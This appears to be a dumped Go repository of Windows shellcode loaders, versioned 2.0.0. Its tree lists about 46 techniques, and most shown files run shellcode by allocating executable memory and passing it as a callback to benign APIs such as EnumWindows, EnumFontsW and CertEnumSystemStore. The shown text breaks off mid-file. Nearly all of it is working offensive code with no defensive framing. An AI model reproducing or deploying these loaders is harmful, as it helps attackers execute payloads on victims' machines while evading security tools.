├── pkg ├── EnumWindows │ └── EnumWindows.go ├── EnumUILanguagesW │ └── EnumUILanguagesW.go ├── EnumPwrSchemes │ └── EnumPwrSchemes.go ├── EnumSystemLocales │ └── EnumSystemLocales.go ├── EnumPageFilesW │ └── EnumPageFilesW.go ├── EnumPropsW │ └── EnumPropsW.go ├── EnumPropsEx │ └── EnumPropsEx.go ├── ImmEnumInputContext │ └── ImmEnumInputContext.go ├── EnumThreadWindows │ └── EnumThreadWindows.go ├── EnumLanguageGroupLocalesW │ └── EnumLanguageGroupLocalesW.go ├── EnumWindowStationsW │ └── EnumWindowStationsW.go ├── CryptEnumOIDInfo │ └── CryptEnumOIDInfo.go ├── EnumResourceTypesW │ └── EnumResourceTypesW.go ├── EnumFontsW │ └── EnumFontsW.go ├── CertEnumSystemStore │ └── CertEnumSystemStore.go ├── CertEnumSystemStoreLocation │ └── CertEnumSystemStoreLocation.go ├── EnumTimeFormatsEx │ └── EnumTimeFormatsEx.go ├── EnumerateLoadedModules │ └── EnumerateLoadedModules.go ├── config │ └── Funcinit.go ├── EnumDisplayMonitors │ └── EnumDisplayMonitors.go ├── FlsAlloc │ └── FlsAlloc.go ├── EnumFontFamiliesW │ └── EnumFontFamiliesW.go ├── InitOnceExecuteOnce │ └── InitOnceExecuteOnce.go ├── EnumCalendarInfo │ └── EnumCalendarInfo.go ├── EnumChildWindows │ └── EnumChildWindows.go ├── EnumCalendarInfoEX │ └── EnumCalendarInfoEX.go ├── EnumICMProfiles │ └── EnumICMProfiles.go ├── EnumObjects │ └── EnumObjects.go ├── EnumResourceTypesExW │ └── EnumResourceTypesExW.go ├── EnumFontFamiliesExW │ └── EnumFontFamiliesExW.go ├── SymEnumProcesses │ └── SymEnumProcesses.go ├── EnumDesktopWindows │ └── EnumDesktopWindows.go ├── SetTimer │ └── SetTimer.go ├── SysEnumSourceFiles │ └── SysEnumSourceFiles.go ├── EnumDesktopW │ └── EnumDesktopW.go ├── CopyFileEx │ └── CopyFileEx.go ├── EnumDirTreeW │ └── EnumDirTreeW.go ├── CreateTimerQueueTimer_Tech │ └── CreateTimerQueueTimer_Tech.go ├── FiberContextEdit │ └── FiberContextEdit.go ├── LdrpCallInitRoutine │ └── LdrpCallInitRoutine.go ├── ImageGetDigestStream │ └── ImageGetDigestStream.go ├── CopyFile2 │ └── CopyFile2.go ├── RtlUserFiberStart │ └── RtlUserFiberStart.go ├── CreateThreadPoolWait │ └── CreateThreadPoolWait.go ├── SetupCommitFileQueueW │ └── SetupCommitFileQueueW.go ├── SymFindFileInPath │ └── SymFindFileInPath.go └── LdrEnumerateLoadedModules │ └── LdrEnumerateLoadedModules.go └── README.md /pkg/EnumWindows/EnumWindows.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | User32 = syscall.MustLoadDLL("User32.dll") 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | EnumWindows = User32.MustFindProc("EnumWindows") 24 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 25 | ) 26 | 27 | func Callback(shellcode []byte) { 28 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 29 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 30 | EnumWindows.Call(addr, 0) 31 | } 32 | -------------------------------------------------------------------------------- /pkg/EnumUILanguagesW/EnumUILanguagesW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | MUI_LANGUAGE_ID = 0x4 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | EnumUILanguagesW = kernel32.MustFindProc("EnumUILanguagesW") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 31 | EnumUILanguagesW.Call(addr, MUI_LANGUAGE_ID, NULL) 32 | } 33 | -------------------------------------------------------------------------------- /pkg/EnumPwrSchemes/EnumPwrSchemes.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | dummy [522]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | PowrProf = syscall.MustLoadDLL("PowrProf.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | EnumPwrSchemes = PowrProf.MustFindProc("EnumPwrSchemes") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | func Callback(shellcode []byte) { 30 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 32 | EnumPwrSchemes.Call(addr, NULL) 33 | } 34 | -------------------------------------------------------------------------------- /pkg/EnumSystemLocales/EnumSystemLocales.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | LOCALE_ALL = 0 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | EnumSystemLocalesEx = kernel32.MustFindProc("EnumSystemLocalesEx") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 31 | EnumSystemLocalesEx.Call(addr, LOCALE_ALL, NULL, NULL) 32 | } 33 | -------------------------------------------------------------------------------- /pkg/EnumPageFilesW/EnumPageFilesW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 22 | K32EnumPageFilesW = kernel32.MustFindProc("K32EnumPageFilesW") 23 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 24 | ) 25 | 26 | func Callback(shellcode []byte) { 27 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 28 | if err != nil && err.Error() != "The operation completed successfully." { 29 | syscall.Exit(0) 30 | } 31 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 32 | K32EnumPageFilesW.Call(addr, 0) 33 | } 34 | -------------------------------------------------------------------------------- /pkg/EnumPropsW/EnumPropsW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | User32 = syscall.MustLoadDLL("User32.dll") 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | GetTopWindow = User32.MustFindProc("GetTopWindow") 24 | EnumPropsW = User32.MustFindProc("EnumPropsW") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 31 | dummy, _, _ := GetTopWindow.Call(0) 32 | EnumPropsW.Call(dummy, addr, 0) 33 | } 34 | -------------------------------------------------------------------------------- /pkg/EnumPropsEx/EnumPropsEx.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | User32 = syscall.MustLoadDLL("User32.dll") 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | GetTopWindow = User32.MustFindProc("GetTopWindow") 24 | EnumPropsExW = User32.MustFindProc("EnumPropsExW") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 31 | dummy, _, _ := GetTopWindow.Call(0) 32 | EnumPropsExW.Call(dummy, addr, 0) 33 | } 34 | -------------------------------------------------------------------------------- /pkg/ImmEnumInputContext/ImmEnumInputContext.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | NULL = 0 17 | ) 18 | 19 | var ( 20 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 21 | ntdll = syscall.MustLoadDLL("ntdll.dll") 22 | Imm32 = syscall.MustLoadDLL("Imm32.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | ImmEnumInputContext = Imm32.MustFindProc("ImmEnumInputContext") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 31 | ImmEnumInputContext.Call(NULL, addr, NULL) 32 | } 33 | -------------------------------------------------------------------------------- /pkg/EnumThreadWindows/EnumThreadWindows.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | LOCALE_ALL = 0 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | User32 = syscall.MustLoadDLL("User32.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | EnumThreadWindows = User32.MustFindProc("EnumThreadWindows") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | func Callback(shellcode []byte) { 30 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 32 | EnumThreadWindows.Call(0, addr, NULL) 33 | } 34 | -------------------------------------------------------------------------------- /pkg/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | dummy [522]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | LGRPID_ARABIC = 0x000d 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | EnumLanguageGroupLocalesW = kernel32.MustFindProc("EnumLanguageGroupLocalesW") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 31 | EnumLanguageGroupLocalesW.Call(addr, LGRPID_ARABIC, 0, 0) 32 | } 33 | -------------------------------------------------------------------------------- /pkg/EnumWindowStationsW/EnumWindowStationsW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | User32 = syscall.MustLoadDLL("User32.dll") 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | EnumWindowStationsW = User32.MustFindProc("EnumWindowStationsW") 24 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 25 | ) 26 | 27 | func Callback(shellcode []byte) { 28 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 29 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 30 | //p1 := []byte{110, 116, 100, 108, 108, 46, 100, 108, 108, 0} // Kernel32.dll 31 | EnumWindowStationsW.Call(addr, 0) 32 | } 33 | -------------------------------------------------------------------------------- /pkg/CryptEnumOIDInfo/CryptEnumOIDInfo.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | Crypt32 = syscall.MustLoadDLL("Crypt32.dll") 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 24 | CryptEnumOIDInfo = Crypt32.MustFindProc("CryptEnumOIDInfo") 25 | ) 26 | 27 | func Callback(shellcode []byte) { 28 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 29 | if err != nil && err.Error() != "The operation completed successfully." { 30 | syscall.Exit(0) 31 | } 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 33 | CryptEnumOIDInfo.Call(0, 0, 0, addr) 34 | } 35 | -------------------------------------------------------------------------------- /pkg/EnumResourceTypesW/EnumResourceTypesW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 22 | EnumResourceTypesW = kernel32.MustFindProc("EnumResourceTypesW") 23 | LoadLibraryW = kernel32.MustFindProc("LoadLibraryW") 24 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 25 | ) 26 | 27 | func Callback(shellcode []byte) { 28 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 29 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 30 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 31 | lw, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 32 | EnumResourceTypesW.Call(lw, addr, 0) 33 | } 34 | -------------------------------------------------------------------------------- /pkg/EnumFontsW/EnumFontsW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | dummy [522]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | User32 = syscall.MustLoadDLL("User32.dll") 24 | Gdi32 = syscall.MustLoadDLL("Gdi32.dll") 25 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 26 | GetDC = User32.MustFindProc("GetDC") 27 | EnumFontsW = Gdi32.MustFindProc("EnumFontsW") 28 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 34 | dc, _, _ := GetDC.Call(NULL) 35 | EnumFontsW.Call(dc, NULL, addr, NULL) 36 | } 37 | -------------------------------------------------------------------------------- /pkg/CertEnumSystemStore/CertEnumSystemStore.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "golang.org/x/sys/windows" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | const ( 10 | MEM_COMMIT = 0x1000 11 | MEM_RESERVE = 0x2000 12 | PAGE_EXECUTE_READWRITE = 0x40 13 | ) 14 | 15 | var ( 16 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 17 | ntdll = syscall.MustLoadDLL("ntdll.dll") 18 | Crypt32 = syscall.MustLoadDLL("Crypt32.dll") 19 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 20 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 21 | CertEnumSystemStore = Crypt32.MustFindProc("CertEnumSystemStore") 22 | ) 23 | 24 | func Callback(shellcode []byte) { 25 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 26 | if err != nil && err.Error() != "The operation completed successfully." { 27 | syscall.Exit(0) 28 | } 29 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 30 | CertEnumSystemStore.Call(windows.CERT_SYSTEM_STORE_CURRENT_USER, 0, 0, addr) 31 | 32 | } 33 | -------------------------------------------------------------------------------- /pkg/CertEnumSystemStoreLocation/CertEnumSystemStoreLocation.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | const ( 9 | MEM_COMMIT = 0x1000 10 | MEM_RESERVE = 0x2000 11 | PAGE_EXECUTE_READWRITE = 0x40 12 | ) 13 | 14 | var ( 15 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 16 | ntdll = syscall.MustLoadDLL("ntdll.dll") 17 | Crypt32 = syscall.MustLoadDLL("Crypt32.dll") 18 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 19 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 20 | CertEnumSystemStoreLocation = Crypt32.MustFindProc("CertEnumSystemStoreLocation") 21 | ) 22 | 23 | func Callback(shellcode []byte) { 24 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 25 | if err != nil && err.Error() != "The operation completed successfully." { 26 | syscall.Exit(0) 27 | } 28 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 29 | CertEnumSystemStoreLocation.Call(0, 0, addr) 30 | } 31 | -------------------------------------------------------------------------------- /pkg/EnumTimeFormatsEx/EnumTimeFormatsEx.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | TIME_NOSECONDS = 0x00000002 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | EnumTimeFormatsEx = kernel32.MustFindProc("EnumTimeFormatsEx") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 31 | LOCALE_NAME_SYSTEM_DEFAULT, _ := syscall.UTF16PtrFromString("!x-sys-default-locale") 32 | EnumTimeFormatsEx.Call(addr, uintptr(unsafe.Pointer(LOCALE_NAME_SYSTEM_DEFAULT)), TIME_NOSECONDS, NULL) 33 | } 34 | -------------------------------------------------------------------------------- /pkg/EnumerateLoadedModules/EnumerateLoadedModules.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | Dbghelp = syscall.MustLoadDLL("Dbghelp.dll") 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") 24 | EnumerateLoadedModules = Dbghelp.MustFindProc("EnumerateLoadedModules") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 31 | Proces, _, _ := GetCurrentProcess.Call() 32 | EnumerateLoadedModules.Call(Proces, addr, 0) 33 | } 34 | -------------------------------------------------------------------------------- /pkg/config/Funcinit.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | func CallBackFunc() []string { 4 | fruits := []string{"CertEnumSystemStore", "CertEnumSystemStoreLocation", "CopyFile2", "CopyFileEx", "CreateThreadPoolWait", "CreateTimerQueueTimer_Tech", "CryptEnumOIDInfo", "EnumCalendarInfo", "EnumCalendarInfoEX", "EnumChildWindows", "EnumDesktopW", "EnumDesktopWindows", "EnumDirTreeW", "EnumDisplayMonitors", "EnumerateLoadedModules", "EnumFontFamiliesExW", "EnumFontFamiliesW", "EnumFontsW", "EnumICMProfiles", "EnumLanguageGroupLocalesW", "EnumObjects", "EnumPageFilesW", "EnumPropsEx", "EnumPropsW", "EnumPwrSchemes", "EnumResourceTypesExW", "EnumResourceTypesW", "EnumSystemLocales", "EnumThreadWindows", "EnumTimeFormatsEx", "EnumUILanguagesW", "EnumWindows", "EnumWindowStationsW", "FiberContextEdit", "FlsAlloc", "ImageGetDigestStream", "ImmEnumInputContext", "InitOnceExecuteOnce", "LdrEnumerateLoadedModules", "LdrpCallInitRoutine", "RtlUserFiberStart", "SetTimer", "SetupCommitFileQueueW", "SymEnumProcesses", "SymFindFileInPath", "SysEnumSourceFiles"} 5 | return fruits 6 | } 7 | func VersionFunc() string { 8 | Version := "2.0.0" 9 | return Version 10 | } 11 | -------------------------------------------------------------------------------- /pkg/EnumDisplayMonitors/EnumDisplayMonitors.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | dummy [522]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | TRUE = 1 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | User32 = syscall.MustLoadDLL("User32.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | EnumDisplayMonitors = User32.MustFindProc("EnumDisplayMonitors") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | func Callback(shellcode []byte) { 30 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | if err != nil && err.Error() != "The operation completed successfully." { 32 | syscall.Exit(0) 33 | } 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | EnumDisplayMonitors.Call(0, 0, addr, 0) 36 | } 37 | -------------------------------------------------------------------------------- /pkg/FlsAlloc/FlsAlloc.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | NULL = 0 17 | ) 18 | 19 | var ( 20 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 21 | ntdll = syscall.MustLoadDLL("ntdll.dll") 22 | VirtualAlloc = 